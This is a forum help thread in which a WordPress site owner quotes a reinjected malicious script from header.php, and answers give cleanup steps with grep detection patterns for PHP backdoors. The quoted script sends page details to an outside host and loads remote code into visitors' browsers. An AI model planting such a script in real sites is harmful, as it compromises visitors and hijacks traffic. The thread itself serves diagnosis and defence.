jQuery.min.php Malware on my site

Question

Looking for some help from anyone who is familiar with jquery Malware. I have been infected with an Injected Script in my WordPress website and everytime I remove the Injected Code from my Header.php 24 Hours later it has injected a modified version of it back into the Header.php files on my hosting server.

Driving me crazy. The site is www.icrsolutions.co.uk and the script reads below:

<script>
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://uniluxvfc.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
    document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>

Answer 1

The following applies to Joomla as well:

1. Change all your passwords.
2. Update your installation and any add-on's/modules to the latest versions.
3. Identify and clean all files containing the malicious script. On Linux, you can use the following to find the files: grep -r jquery.min.php <webserver directory> | awk -F\: '{ print $1 }'
4. Clean all files containing any "payload". On Linux, you can use the following to identify those files. There will be false positives, so when in doubt, check the file against a fresh copy of your CMS. egrep -Rl '\$GLOBALS.*\\x|GLO.*SERVER|\$_COOKIE|,"508"|function.*for.*strlen.*isset|isset.*eval' <webserver directory> 2>/dev/null

Answer 2

Change every password and then delete the scripts / malicious code.

Then after that, update every plugin, and wordpress itself.